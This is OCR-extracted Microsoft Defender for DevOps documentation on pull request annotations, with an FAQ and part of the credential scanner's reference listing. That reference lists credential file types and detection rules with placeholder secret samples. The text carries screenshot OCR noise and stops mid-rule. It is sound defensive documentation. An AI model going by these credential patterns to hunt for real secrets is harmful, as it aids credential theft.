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Defender for DevOps exposes security findings as annotations in Pull Requests (PR). 
Security operators can enable PR annotations in Microsoft Defender for Cloud. Any 
exposed issues can then be remedied by developers. This process can prevent and fix 
potential security vulnerabilities and misconfigurations before they enter the production 
stage. Defender for DevOps annotates the vulnerabilities within the differences in the 
file rather than all the vulnerabilities detected across the entire file. Developers are able 
to see annotations in their source code management systems and Security operators 
can see any unresolved findings in Microsoft Defender for Cloud. 


With Microsoft Defender for Cloud, you can configure PR annotations in Azure DevOps. 
You can get PR annotations in GitHub if you're a GitHub Advanced Security customer. 


O Note 


GitHub Advanced Security for Azure DevOps (GHAzDO) is providing a free trial of 
PR annotations during the Defender for DevOps preview. 


What are pull request annotations 


Pull request annotations are comments that are added to a pull request in GitHub or 
Azure DevOps. These annotations provide feedback on the code changes made and 
identified security issues in the pull request and help reviewers understand the changes 
that are made. 


Annotations can be added by a user with access to the repository, and can be used to 
suggest changes, ask questions, or provide feedback on the code. Annotations can also 
be used to track issues and bugs that need to be fixed before the code is merged into 
the main branch. Defender for DevOps uses annotations to surface security findings. 


Prerequisites 
For GitHub: 


e An Azure account. If you don't already have an Azure account, you can create your 
Azure free account today”. 


e Bea GitHub Advanced Security “ customer. 
e Connect your GitHub repositories to Microsoft Defender for Cloud. 
e Configure the Microsoft Security DevOps GitHub action. 


For Azure DevOps: 


e An Azure account. If you don't already have an Azure account, you can create your 
Azure free account today“. 

e Have write access (owner/contributer) to the Azure subscription. 

e Connect your Azure DevOps repositories to Microsoft Defender for Cloud. 

e Configure the Microsoft Security DevOps Azure DevOps extension. 

e Setup secret scanning in Azure DevOps. 


Enable pull request annotations in GitHub 


By enabling pull request annotations in GitHub, your developers gain the ability to see 
their security issues when they create a PR directly to the main branch. 


To enable pull request annotations in GitHub: 
1. Navigate to GitHub £ and sign in. 
2. Select a repository that you've onboarded to Defender for Cloud. 


3. Navigate to Your repository's home page > .github/workflows. 


OO Search or jump to... Pull requests Issues Marketplace Explore 
& Test /Contoso-Test Private @unwatch 1 ~ NK Foko ~ saro ~ 
<> Code © Issues fù Pullrequests © Actions D Projets © Security be Insights GZ Settings 
P main ~ P 1branch © 0 tags Go to file Add file ~ About & 
No description, website, or topics provided. 
Create README.md X 7c61233 1hourago GOA commits 
DU Readme 
ES github/workflows Update msdevopssec.yml 12 days ago ZZ Ostars 
1 watch 
DO README.md Create README.md 1 hour ago S AES 
Y D forks 
DO azuredeploy.json Create azuredeploy.json 8 days ago 
README.md 2 dre 
No releases published 
Create a new release 
e Welcome to Contoso Hotels Open source Web app 
test Contoso web. Packages 


No packages published 
Publish your first package 


OO © 2022 GitHub, Inc. Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About 


4. Select msdevopssec.yml, which was created in the prerequisites. 


OO Search or jump to Pull requests Issues Marketplace Explore 


& Test/Contoso-Test Private @nwatch 1 ~ KE Foko ~ stro e 


<> Code © Issues IL Pullrequests © Actions M Projects © Security be Insights 3 Settings 


E main + Contoso-Test / github / workflows / Go to file Add file ~ 


Update msdevopssec.yml X c22193 12 daysago © History 


a 


O msdevopssec.yml Update msdevopssec.yml 12 daysago 


5. Select edit. 


E main + Contoso-Test / github / workflows / msdevopssec.yml View runs Go to file 


Create msdevopssecyml v Latest commit d16fe42 19 hours ago © History 


AR 1 contributor 


36 lines (29 sloc) 1.11 KB Raw Blame [-]§ Os 


6. Locate and update the trigger section to include: 
yml 


# Triggers the workflow on push or pull request events but only for the 
main branch 
pull_request: 

branches: ["main" 


You can also view a sample repository“. 


(Optional) You can select which branches you want to run it on by entering the 


branch(es) under the trigger section. If you want to include all branches remove 
the lines with the branch list. 


7. Select Start commit. 
8. Select Commit changes. 
Any issues that are discovered by the scanner will be viewable in the Files changed 
section of your pull request. 
Resolve security issues in GitHub 
To resolve security issues in GitHub: 


1. Navigate through the page and locate an affected file with an annotation. 


2. Follow the remediation steps in the annotation. If you choose not to remediate the 


annotation, select Dismiss alert. 
3. Select a reason to dismiss: 


e Won't fix - The alert is noted but won't be fixed. 
e False positive - The alert isn't valid. 
e Used in tests - The alert isn't in the production code. 


Enable pull request annotations in Azure 
DevOps 


By enabling pull request annotations in Azure DevOps, your developers gain the ability 
to see their security issues when they create PRs directly to the main branch. 


Enable Build Validation policy for the Cl Build 


Before you can enable pull request annotations, your main branch must have enabled 
Build Validation policy for the CI Build. 


To enable Build Validation policy for the CI Build: 
1. Sign in to your Azure DevOps project. 


2. Navigate to Project settings > Repositories. 


Repos 


Artifacts 


ai Storage 


Test 


ZO Retention 


£93 
»> 


3. Select the repository to enable pull requests on. 
4. Select Policies. 


5. Navigate to Branch Policies > Main branch. 


ttings Repositories 


< All Repositories + Contoso Hotels 


Security 


Y Filter by keywords 


Repository Policies 


Off Commit author email validation 
Block 
following patterns. 


shes with a commit author email that does not match the 


e off File path validation 
BI pushes from introducing file paths that match the following 
patterns 


e Off Case enforcement 


ase-sensitivity conflicts by b 


pushes that change name 
gs. Learn more 


Off 
es that 
s. Learn 
e off Maximum path length 
Block pushes that introduce paths that exceed the specified length. 
Learn more 
e Off Maximum file size 


Block pushes that contain new or updated files larger than this limit 


Branch Policies 


Protect important branch namespaces in this repository with pre-merge checks and policies 


> E users/ammuhamm 


% azure-pipelines 


P initial-commit @ Q 


6. Locate the Build Validation section. 


7. Ensure the build validation for your repository is toggled to On. 


~ Build Validation + Y Filter | 


Validate code by pre-merging and building pull request changes Q 
Enabled Name | Path filter Inhe ita 


Trigger nce 


Contoso Hotels Automatic 
Required Expires 2 hours 


8. Select Save. 


Edit build policy x 


Enabled 
ZO o 
Build pipeline * 
Ww 
Path filter (optional) 
O 


Trigger 


@ Automatic (whenever the source branch is updated} 
Manual 


Policy requirement 


@ Required 


Build must succeed in order to complete pull request 


Optional 


Build failure will not block completion of pull request: 
Build expiration 


Immediately when main is updated 
@ After! 12 hours if main has been updated 


Never 


Display name 


Once you've completed these steps, you can select the build pipeline you created 
previously and customize its settings to suit your needs. 


Enable pull request annotations 
To enable pull request annotations in Azure DevOps: 
1. Sign in to the Azure portal £. 
2. Navigate to Defender for Cloud > DevOps Security. 


3. Select all relevant repositories to enable the pull request annotations on. 


4. Select Configure. 


+ Add environment v © Refresh ZA DevOps workbook SO Guides and Feedback > Getting Started QO Configure 


5. Toggle Pull request annotations to On. 


Configuration x 


Pull Request Annotations | PREVIEW 
Set pull request annotations 


Pull Request Annotations * €D On 


OO The configuration will apply for all selected repositories in Azure DevOps. Learn More 


Categories (©) 
Select categories * Secret scanning 
Severity levels @ 


Select levels * High 


Save Cancel 


6. (Optional) Select a category from the drop-down menu. 


© Note 
Only secret scan results and Infrastructure-as-Code misconfigurations for 
ARM/Bicep templates are currently supported. 
7. (Optional) Select a severity level from the drop-down menu. 
8. Select Save. 
All annotations on your pull requests will be displayed from now on based on your 
configurations. 
Resolve security issues in Azure DevOps 
Once you've configured the scanner, you're able to view all issues that were detected. 


To resolve security issues in Azure DevOps: 


1. Sign in to the Azure DevOps č . 


2. Navigate to Pull requests. 


ed Overview 
Ea Boards 
yea Repos 


k Files 


Q Commits 


L?; Pushes 


fo Branches 
Q Tags 


I Pull requests 


3. On the Overview, or files page, locate an affected line with an annotation. 
4. Follow the remediation steps in the annotation. 


5. Select Active to change the status of the annotation and access the dropdown 


menu. 
6. Select an action to take: 


e Active - The default status for new annotations. 

e Pending - The finding is being worked on. 

e Resolved - The finding has been addressed. 

e Won't fix - The finding is noted but won't be fixed. 
e Closed - The discussion in this annotation is closed. 


Defender for DevOps reactivates an annotation if the security issue isn't fixed in a new 


iteration. 


Learn more 


Learn more about Defender for DevOps. 
Learn how to Discover misconfigurations in Infrastructure as Code. 


Learn how to detect exposed secrets in code. 


Next steps 


Now learn more about EPAR EA Gar Dene 


Common questions about 
Defender for DevOps 


FAQ 


Get answers to common questions about Microsoft Defender for DevOps. 


Scan specific folders for secrets in ADO 

repos with CredScan 

If you want to scan specific folders in Azure DevOps repos with CredScan, you can use: 
yml 


env: 
credscan_targetdirectory: '‘NameOfFolderToScanForSecrets/' 


A full ADO YAML file for a pipeline that does CredScan scanning for secrets on a specific 
folder could look like this: 


yml 


trigger: 
branches: 
include: 
- main 
- master 


pool: 
vmImage: "windows- latest" 


steps: 
- task: MicrosoftSecurityDevOps@1 

displayName: "Microsoft Security DevOps" 

inputs: 
categories: ‘secrets’ 
break: false 

env: 
credscan_targetdirectory: '‘NameOfFolderToScanForSecrets/' 


Why am I getting an error while trying 
to connect? 


When you select the Authorize button, the account that you're logged in with is used. 
That account can have the same email but may have a different tenant. Make sure you 
have the right account/tenant combination selected in the popup consent screen and 
Visual Studio. 


You can check which account is signed in £. 


Why can't I find my repository? 
The Azure DevOps service only supports TfsGit. 


Ensure that you've onboarded your repositories to Microsoft Defender for Cloud. If you 
still can't see your repository, ensure that you're signed in with the correct Azure 
DevOps organization user account. Your Azure subscription and Azure DevOps 
Organization need to be in the same tenant. If the user for the connector is wrong, you 
need to delete the previously created connector, sign in with the correct user account 
and re-create the connector. 


Why didn't Secret scan run on my code? 


To ensure your code is scanned for secrets, make sure you've onboarded your 
repositories to Defender for Cloud. 


In addition to onboarding resources, you must have the Microsoft Security DevOps 
(MSDO) Azure DevOps extension configured for your pipelines. The extension runs 
secret scan along with other scanners. 


If no secrets are identified through scans, the total exposed secret for the resource 
shows Healthy in Defender for Cloud. 


If secret scan isn't enabled (meaning MSDO isn't configured for your pipeline) or a scan 
isn't performed for at least 14 days, the resource shows as N/A in Defender for Cloud. 


Why don't I see the generated SARIF file 
in the path | chose to drop it? 


If you don't see SARIF file in the expected path, you may have chosen a different drop 
path than the CodeAnalysisLogs/msdo.sarif one. Currently you should drop your SARIF 


files to CodeAnalysisLogs/msdo. sarif. 


Why don't I see the results for my ADO 
projects in Microsoft Defender for 
Cloud? 


When you use classic pipeline configuration, make sure you don't change artifact name. 
This can result not seeing the results for your project. 


Currently, OSS vulnerability findings are only available for GitHub repositories. Azure 
DevOps repositories will have the total exposed secrets, laC misconfigurations, and code 
security findings available. It will show n/a for OSS vulnerabilities. You can learn more 


about how to Review your findings. 


Why is my Azure DevOps repository not 
refreshing to healthy? 


For a previously unhealthy scan result to be healthy again, updated healthy scan results 
need to be from the same build definition as the one that generated the findings in the 
first place. A common scenario where this issue occurs is when testing with different 
pipelines. For results to refresh appropriately, scan results need to be for the same 
pipeline(s) and branch(es). 


If no scan is performed for 14 days, the scan results revert to N/A. 


Why don't | see Recommendations for 
findings? 


Ensure that you've onboarded the project with the connector and that your repository 
(that build is for), is onboarded to Microsoft Defender for Cloud. You can learn how to 
onboard your DevOps repository to Defender for Cloud. 


You must have more than a stakeholder license “ to the repos to onboard them, and 
you need to be at least the security reader on the subscription where the connector is 
created. You can confirm if you've onboarded the repositories by seeing them in the 
inventory list in Microsoft Defender for Cloud. 


| successfully onboarded a connector, 
where can | find my DevOps 
recommendations? 


We recommend navigating to the DevOps Security page to see an overview of your 
DevOps recommendations and posture. You can sort and filter by the repos you care 
about to dive into the recommendation details. 


You can also view your DevOps recommendations on the Recommendations page. 
Navigate to Recommendations, select the "All recommendations" tab, and filter the 
environment by the relevant DevOps sources (e.g., AZureDevOps and/or GitHub). 


What information does Defender for 
DevOps store about me and my 
enterprise, and where is the data stored 
and processed? 


Defender for DevOps connects to your source code management system, for example, 
Azure DevOps, GitHub, to provide a central console for your DevOps resources and 
security posture. Defender for DevOps processes and stores the following information: 


e Metadata on your connected source code management systems and associated 
repositories. This data includes user, organizational, and authentication 


information. 
e Scan results for recommendations and assessments results and details. 


Data is stored within the region your connector is created in and flows into Microsoft 
Defender for Cloud. You should consider which region to create your connector in, for 
any data residency requirements as you design and create your DevOps connector. 


Defender for DevOps currently doesn't process or store your code, build, and audit logs. 


Learn more about Microsoft Privacy Statement Z. 


Why are Delete Source and Write Code 
permissions required for Azure DevOps? 


Azure DevOps doesn't have the necessary granularity for its permissions. These 
permissions are required for some of the Defender for DevOps features, such as pull 
request annotations in order to work. 


Is Exemptions capability available and 
tracked for app sec vulnerability 
management? 


Exemptions aren't available for Defender for DevOps within Microsoft Defender for 
Cloud. 


Why am I not able to see GitHub 
Advanced Security for Azure Devops 
(GHAzDO) results in Defender for 
Cloud? 


Ensure you are using the same Subscription ID for GHAzDO and Defender for Cloud. If 
you are still unable to see the results, the issue might be caused by your ADO connector 
lacking the necessary scope. Defender for DevOps introduced new scopes to ADO 
connectors in June. If you created the connector before June and haven't updated it, 
you won't be able to see GHAzDO results due to missing scope on the connector. You 
would need to create a new ADO connector, which will automatically include the new 
scopes. 


Is continuous, automatic scanning 
available? 


Currently, scanning occurs at build time. 


Is it possible to block the developers 
committing code with exposed secrets? 


The ability to block developers from committing code with exposed secrets isn't 
currently available. 


Why am I not able to configure Pull 
Request Annotations? 


Make sure you have write (owner/contributor) access to the subscription. If you don't 
have this type of access today, you can get it through activating a Microsoft Entra role in 
PIM. 


What programming languages are 
supported by Defender for DevOps? 


The following languages are supported by Defender for DevOps: 


e Python 
e JavaScript 
e TypeScript 


Why am | getting an error that informs 
me that there's no CLI tool? 


When you run the pipeline in Azure DevOps, you receive the following error: no such 


file or directory, scandir 'D:\a\_msdo\versions\microsoft.security.devops.cli’. 


QJ Azure DevOps defender4devops lat-python Pipelines DfDPlayground 20230222.1 = f 0O AB O 
lat-python b b p 3 
© #20230222.1 - Update azure-pipelines.yml for Azure Pipelines Rerun failed jobs | un new | : 
dy DfDPlayground 
a Overview 
E Boards © This run will be cleaned up after 1 month based on your project settings. 
E Repos 
Summary y Scans 
SO Pipelines 
Py Stan i 
b Pipelines Pull request by Cr) Liana Tomescu View change 
Envi Its 
SO EEE Repository and version Time started and elapsed Related Tests and coverage 
ZI Releases © DfDPlayground E Today at 10:40 20 work it A Get started 
2217 € 598974f6 © amas EO artifacts 
D Library 
ES Task groups 
Errors 1 


TE Deployment groups 


& Test Plans 
A Artifacts 


Troubleshooting failed runs 


Name Status Duration Q 
aile © 1m 50s 


This error can be seen in the extensions job as well. 


GO Azure DevOps defenderd4devops jat-python Pipelines DfDPlayground 20230222 E Search = ia © Pa OO 
lat-python + 
Overview 
E Boards Mets 
A v DO Job 1m 50s 
E Repos 

Initialize job 2 
SO Pipelines 


i Pipelines 


< Jobs in run #20230222.1 *) Microsoft Security DevOps P | View rawlog 


DfDPlayground 


Checkout DfDPlaygrou.. 


Use dotnet 
Æ Environments 
Use dotnet 54s 


& Releases \5.@.408\Sdks\Microsoft.NET.Sdk\target: oft.NET. TargetFrameworkInference.targe 


Microsoft Security Dev. 
D Library 


9°08 8k 8 8 


Post-job: Checkout Df... <15 


\S.@.408\Sdks\Microsoft .NET.Sdk\targets \Microsoft.NET.TargetFrameworkInference. tar} 


= Task groups 
Finalize Job BO 


Deployment groups ZO soft.NET.Sdk\ta oft. NET. TargetF 


Report build status dE 
A Test Plans 


E, Artifacts 


This error occurs if you're missing the dependency of dotneté in the pipeline’s YAML 


file. DotNet6 is required to allow the Microsoft Security DevOps extension to run. 
Include this as a task in your YAML file to eliminate the error. 


You can learn more about Microsoft Security DevOps £. 


Can | migrate the connector to a 
different region? 


For example, can | migrate the connector from the Central US region to the West Europe 


region? 


We don't support automatic migration for the Defender for DevOps connectors from 
one region to another at this time. 


If you want to move a connector’s location, for example a GitHub or Azure DevOps 
connector, to be stored in a different region than the original one where the connector 
was created, the recommendation is to delete the existing connector and then to create 


another connector in the new region. 


Do API calls made by Defender for 
Cloud count against my consumption 
limit? 


Yes, API calls made by Defender for Cloud count against the Azure DevOps Global 
consumption limit. Defender for Cloud makes calls on-behalf of the user who onboards 
the connector. 


Why is my organization list empty in the 
UI? 


If your organization list is empty in the UI after you onboarded an Azure DevOps 
connector, you need to ensure that the organization in Azure DevOps is connected to 
the Azure tenant that has the user who authenticated the connector. 


For information on how to correct this issue, check out the DevOps trouble shooting 


guide. 


I have a large Azure DevOps 
organization with many repositories. 
Can I still onboard? 


Yes, there is no limit to how many Azure DevOps repositories you can onboard to 


Defender for DevOps. 


However, there are two main implications when onboarding large organizations — speed 
and throttling. The speed of discovery for your DevOps repositories is determined by 
the number of projects for each connector (approximately 100 projects per hour). 
Throttling can happen because Azure DevOps API calls have a global rate limit and we 
limit the calls for project discovery to use a small portion of overall quota limits. 


Consider using an alternative Azure DevOps identity (i.e., an Organization Administrator 
account used as a service account) to avoid individual accounts from being throttled 
when onboarding large organizations. Below are some scenarios of when to use an 


alternate identity to onboard a Defender for DevOps connector: 


e Large number of Azure DevOps Organizations and Projects (~500 Projects or 
more). 

e Large number of concurrent builds which peak during work hours. 

e Authorized user is a Power Platform user making additional Azure DevOps API 
calls, using up the global rate limit quotas. 


Once you have onboarded the Azure DevOps repositories using this account and 
configured and ran the Microsoft Security DevOps Azure DevOps extension in your 
CI/CD pipeline, then the scanning results will appear near instantaneously in Microsoft 
Defender for Cloud. 


Next steps 


Learn more about Defender for Defender for DevOps 


Credential scanner 


Article e 02/01/2023 


Defender for DevOps supports many types of files and rules. This article explains all of the 


available file types and rules that are available. 


Supported file types 


Credential scanning supports the following file types: 


Supported file 
types 


0.001 

0.1 

0.8 

* sk 
*password 
pwd.txt 

** /key 
GZ /key 

* 1/key 

* 32bit 

* 3des 

* added_cluster 
* aes128 

* aes192 

* aes256 
*al 

* argfile 
Tas 


* asax 


Supported file 
types 


* conf 


* config 


* cpp 


* cscfg 
* cshtm 


* cshtml 


*.CXX 

* dart 

* dat 

* data 

* dbg 

* defaults 

* definitions 

* deployment 


dockerfile 


Supported 
file types 


id_rsa 

* iis 

* is 

* inc 

* inf 

* ini 

* ino 

* insecure 
* install 

* ipynb 


*isml 


* js 
* json 


* jsonnet 


Supported file 
types 


* p12 
* p12* 
* params 


password 


* positive 
* ppk* 

* priv 
privatekey 


privatkey 


* prop 


Supported file 
types 


* sarif 


scopebindings.json 
* scr 

* script 

* sdf 

* secret 

* settings 
*sh 

* shf 

* side 

* side2 

* snap 

* snippet 
* sql 

* SS 


ssh\config 


Supported 
file types 


* wadcfgx 

* waz 

* webtest 

* WSX 

* wtl 

* xaml 

* xdt 

* xml 

* xslt 

*yaml 

* yml 

* zaliases 

* zhistory 

* zprofile 

* zsh_aliases 
* zsh_history 
* zsh_profile 


* zshrc 


Supported file 
types 


* asmmeta 

* asmx 

* aspx 

* aurora 

* azure 

* backup 

* bak 

* bas 

* bash_aliases 
* bash_history 
* bash_profile 
* bashrc 

* bat 

* Beta 

* BF 

* bicep 


* bim 


Supported file 
types 


_dsa 

* dsql 
* dtsx 
_ecdsa 


_ed25519 


* ext 

* ExtendedTests 
* FF 

* frm 

* gcfg 

* git 

* git/config 

* gitcredentials 
* go 

* gradle 

* groovy 

* grooy 


*gsh 


Supported 
file types 


* Sx 

kefile 

key 

keyfile 

* key 

* key* 

* key.* 

* keys 

* keystore* 

* ling 

* loadtest 

* local 

* log 

*m 

* managers 

* map 

* md 

*md-e 

* mef 

* mst 

* my 

* mysq|_aliases 
* mysql_history 
* mysql_profile 
npmrc 


* nuspec 


Supported file 
types 


* properties 

* ps 

* ps] 

* psclass1 

* psm1 
psql_history 

* pub 

* publishsettings 
* pubxml 

* pubxml.user 


* pvk* 


* reg 

* resx 

* retail 
* robot 
* ray 


TSO 


Supported file 
types 


ssh_config 
* ste 

* SVC 

* svd 

* svg 

* svn-base 
* swift 

* tcl 

* template 
template 
* test 

* textile 

* tf 

* tfvars 
tmdb 

* trd 

* trx 

* ts 

* tsv 

* tsx 

* tt 

* txt 

* user 
user 
userconfig* 


* usersaptinstall 


Supported 
file types 


Supported file Supported file Supported Supported file | Supported file Supported 

types types file types types types file types 

* clean * htm * ois_export * rst * usersaptinstall 

* cls * html * omi * ruby * vb 

*cmd * htpassword *opn * runsettings * vbs 

* code- hubot * orig * sample * vizfx 

workspace 

* coffee * idl * out * SAMPLE * vue 
Supported exit codes 
The following exit codes are available for credential scanning: 

Code Description 

0 Scan completed successfully with no application warning, no suppressed match, no 

credential match. 

1 Partial scan completed with nothing but application warning. 

2 Scan completed successfully with nothing but suppressed match(es). 

3 Partial scan completed with both application warning(s) and suppressed match(es). 

4 Scan completed successfully with nothing but credential match(es). 

5 Partial scan completed with both application warning(s) and credential match(es). 

6 Scan completed successfully with both suppressed match(es) and credential match(es). 

7 Partial scan completed with application warning(s), suppressed match(es) and credential 

match(es). 

-1000 Scan failed with command line argument error. 

-1100 Scan failed with app settings error. 

-1500 Scan failed with other configuration error. 

-1600 Scan failed with IO error. 

-9000 Scan failed with unknown error. 


Rules and descriptions 


The following are the available rules and descriptions for credential scanning 


CSCAN-AWS0010 


Amazon S3 Client Secret Access Key 


Sample: Aws Secret: abcdefghijklmnopqrst@123456789/+ABCDEFGH; 


Learn more about Setup Credentials? and Access keys £. 


CSCAN-AZUREO0010 


Azure Subscription Management Certificate 
Sample: <Subscription id="..." ManagementCertificate="MIIPUuQIBGSIb3DQEHAaCc..." 


Learn more about Azure API management certificates. 


CSCAN-AZURE0020 


Azure SQL Connection String 


Sample: <add key="ConnectionString" 
value="Server=tcp:server.database.windows.net ; database=database; user=user ; password=Z 


YXWVU_2;" 


Learn more about SQL database Azure AD authentication configure. 


CSCAN-AZURE0030 


Azure Service Bus Shared Access Signature 


Sample: 
Endpoint=sb://account.servicebus .windows .net;SharedAccessKey=abcdefghijklmnopqrstuvw 
xyz0123456789/+ABCDE= 

<br>ServiceBusNamespace=. ..SharedAccessPolicy=...Key=abcdefghijklmnopqrstuvwxyz01234 


56789/+ABCDE= 


Learn more about Service Bus authentication and authorization and Service Bus access 


control with Shared Access Signatures. 


CSCAN-AZURE0040 


Azure Redis Cache Connection String Password 


Sample: 


HostName=account.redis.cache.windows.net;Password=abcdefghijklmnopqrstuvwxyz@1234567 


89/+ABCDE= 


Learn more about Azure Cache for Redis. 


CSCAN-AZURE0041 


Azure Redis Cache Identifiable Secret 


Sample: HostName=account.redis.cache.windows.net;Password= 
cThIYLCD6H7LrWrNHQjxhaSBu42KeSzG1AzCaNQJXdA= 
HostName=account.redis.cache.windows.net ;Password= 


FbQqSu216MvwNaquSqpI8MVe@hqlUPgGChOY19dc9xDRMAzCaixCYbQ 


Learn more about Azure Cache for Redis. 


CSCAN-AZURE0050 


Azure loT Shared Access Key 


Sample: HostName=account.azure- 
devices.net ;SharedAccessKeyName=key ; SharedAccessKey=abcdefghijklmnopqrstuvwxyz@12345 
6789/+ABCDE= 


iotHub. ..abcdefghijklmnopqrstuvwxyz0123456789/+ABCDE= 


Learn more about Securing your Internet of Things (loT) deployment and Control access 
to loT Hub using Shared Access Signatures. 


CSCAN-AZURE0060 


Azure Storage Account Shared Access Signature 


Sample: https://account.blob.core.windows.net/? 
sr=...&Sv=...&St=...&se=...&sp=...&sig=abcdefghijklmnopqrstuvwxyz0123456789%2F%2BABC 
DE%3D 


Learn more about Delegating access by using a shared access signature and Migrate an 
application to use passwordless connections with Azure services. 


CSCAN-AZUREO061 


Azure Storage Account Shared Access Signature for High Risk Resources 


Sample: 
https://account.blob.core.windows.net/file.cspkg?...&sig=abcdefghijklmnopgqrstuvwxyz@ 


123456789%2F%2BABCDE%3D 


Learn more about Delegating access by using a shared access signature and Migrate an 
application to use passwordless connections with Azure services. 


CSCAN-AZURE0062 


Azure Logic App Shared Access Signature 


Sample: 
https://account.logic.azure.com/?...&sig=abcdefghijk1lmnopqrstuvwxyz0123456789%2F%2BA 


BCDE%3D 


Learn more about Securing access and data in Azure Logic Apps 


CSCAN-AZURE0070 


Azure Storage Account Access Key 


Sample: 


Endpoint=account.table.core.windows.net ;AccountName=account ; AccountKey=abcdefghijk1m 
nopqrstuvwxyz0123456789/+ABCDEabcdefghijk1mnopqrstuvwxyz0123456789/+ABCDE== 
AccountName=account ; AccountKey=abcdefghijk1lmnopqrstuvwxyz0123456789/+ABCDEabcdefghij 
klmnopqrstuvwxyz0123456789/+ABCDE==...; 
PrimaryKey=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEabcdefghijkimnopqrstuvwxyz@123 
456789/+ABCDE== 


Learn more about Authorization with Shared Key. 


CSCAN-AZUREO071 


Azure Storage Identifiable Secret 


Sample: 
Endpoint=table.core.windows.net ;AccountName=account ; AccountKey=U1imxXW@acA5QRtnkKuW14 


QPSC/F1JFS9m0jd8Ny/Muab42CVkI8G@/ja7uM13G1fiS8pp4c/kzYp+AStvBjS1w== 


AccountName=accountAccountKey=U1imxXW@acA5QRtnkKuW14QPSC/F1IFS9mOj d8Ny /Muab42CVkI8G0/ 
ja7uM13G1fiS8pp4c/kzYp+AStvBjS1w==; EndpointSuffix=...; 
PrimaryKey=U1imxXW@acA5QRtnkKuW14QPSC/F1IFS9m0jd8Ny/Muab42CVkI8GO/ja7uM13G1FiS8pp4c/k 


ZYp+AStvBjS1w== 


Learn more about Authorization with Shared Key and Migrating an application to use 


passwordless connections with Azure services. 


CSCAN-AZURE0080 
Azure COSMOS DB Account Access Key 


Sample: 
AccountEndpoint=https://account. documents. azure.com;AccountKey=abcdefghijklmnopqrstu 
VwxyZ0123456789/+ABCDEabcdef ghijklmnopqrstuvwxyz0123456789/+ABCDE== 
DocDbConnectionStr. ..abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEabcdefghijklmnopqrst 


UVWXYZ0123456789/+ABCDE== 


Learn more about Securing access to data in Azure Cosmos DB. 


CSCAN-AZURE0081 
Identifiable Azure COSMOS DB Account Access Key 


Sample: 
AccountEndpoint=https: //account. documents. azure.com;AccountKey=abcdefghijklmnopqrstu 
VwxyZ0123456789/+ABCDEabcdefghijklmnopqrstuvwxyz0123456789/+ABCDE== 
DocDbConnectionStr. ..abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEabcdefghijklmnopqrst 


UVWXYZ0123456789/+ABCDE== 


Learn more about Securing access to data in Azure Cosmos DB. 


CSCAN-AZURE0090 


Azure App Service Deployment Password 


Sample: userPWD=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEFGHIJKLMNOPQRSTUV; 


PublishingPassword=abcdefghijklmnopqrstuvwxyz0123456789/+ABCDEFGHIIJKLMNOPQRSTUV ; 


Learn more about Configuring deployment credentials for Azure App Service and Get 
publish settings from Azure and import into Visual Studio. 


CSCAN-AZURE0100 


Azure DevOps Personal Access Token 


Sample: URL="org.visualstudio.com/proj"; PAT = 
"ntpi2ch67ci2vjzcohglogyygwo5fuy1365n2zdowwxhsys6jnoa" 
URL="dev.azure.com/org/proj"; PAT = 


"ntpi2ch67ci2vjzcohglogyygwo5fuy1365n2zdowwxhsys6jnoa" 


Learn more about Using personal access tokens. 


CSCAN-AZUREO101 


Azure DevOps App Secret 


Sample: 


AdoAppId=...;AdoAppSecret=ntph2ch67ciqunzcohglogyygwo5fuy1365n4zdowwxhsys6jnoa; 


Learn more about Authorizing access to REST APIs with OAuth 2.0. 


CSCAN-AZURE0120 


Azure Function Primary / API Key 


Sample: https://account.azurewebsites.net/api/function? 
code=abcdefghijk1mnopqrstuvwxyz0123456789%2F%2BABCDEF@123456789%3D%3D... 
ApiEndpoint=account.azurewebsites.net/api/function;Apikey=abcdefghijklmnopqrstuvwxyz 
@123456789/+ABCDEFGHIJKLMNOP==; 


x-functions-key: abcdefghijk1mnopqrstuvwxyz0123456789/+ABCDEFGHIJKLMNOP== 


Learn more about Getting your function access keys and Function access keys 


CSCAN-AZURE0121 


Identifiable Azure Function Primary / API Key 


Sample: https://account.azurewebsites.net/api/function? 
code=abcdefghijk1mnopqrstuvwxyz0123456789%2F%2BABCDEF@123456789%3D%3D... 
ApiEndpoint=account.azurewebsites.net/api/function;Apikey=abcdefghijklmnopqrstuvwxyz 
@123456789/+ABCDEFGHIJKLMNOP==; 


x-functions-key: abcdefghijk1lmnopgqrstuvwxyz0123456789/+ABCDEFGHIJKLMNOP== 


Learn more about Getting your function access keys and Function access keys. 


CSCAN-AZURE0130 
Azure Shared Access Key / Web Hook Token 


Sample: PrimaryKey=abcdefghijklmnopgrstuvwxyz0123456789/+ABCDE=; 


Learn more about Security claims and Azure Media Services concepts. 


CSCAN-AZURE0140 


Azure AD Client Access Token 


Sample: Authorization: Bearer eyJ@eXAiNiJKVIQiLCIhbGciOiJS... 


Learn more about Requesting an access token in Azure Active Directory B2C. 


CSCAN-AZURE0150 
Azure AD User Credentials 


Sample: username=user@tenant .onmicrosoft.com;password=ZYXWVU$1; 


Learn more about Resetting a user's password using Azure Active Directory. 


CSCAN-AZUREO0151 


Azure AD Client Secret 


Sample: "AppId=01234567-abcd-abcd-abcd- 
abcdef012345 ; AppSecret="abc7Q~defghijklmnopqrstuvwxyz-_.~@123" 
"AppId=01234567-abcd-abcd-abcd- 


abcdef012345 ; AppSecret="abc8Q~defghijklmnopqrstuvwxyz-_.~@123456" 


Learn more about Securing service principals. 


CSCAN-AZURE0152 


Azure Bot Service App Secret 


Sample: "account.azurewebsites.net/api/messages ; AppId=01234567 -abcd-abcd-abcd- 


abcdef0@12345 ; AppSecret="abcdeFGHIIJ0K1234567%; [@" 


Learn more about Authentication types. 


CSCAN-AZURE0160 


Azure Databricks Personal Access Token 


Sample: account .azuredatabricks .net ; PAT=dapiabcdef0@123456789abcdef0123456789; 


Learn more about Managing personal access tokens 


CSCAN-AZURE0170 


Azure Container Registry Access Key 


Sample: account .azurecr.io/ #docker password: abcdefghijklmnopqr0123456789/+AB; 


Learn more about Admin account and Create a token with repository-scoped permissions 


CSCAN-AZURE0180 


Azure Batch Shared Access Key 


Sample: 
Account=account. batch. azure.net ;AccountKey=abcdefghijk1lmnopgrstuvwxyz0123456789/+AB 


CDE=; 


Learn more about Batch security and compliance best practices and Create a Batch 
account with the Azure portal. 


CSCAN-AZUREO0181 


Identifiable Azure Batch Shared Access Key 


Sample: 
Account=account. batch. azure.net ;AccountKey=abcdefghijk1lmnopqrstuvwxyz0123456789/+AB 


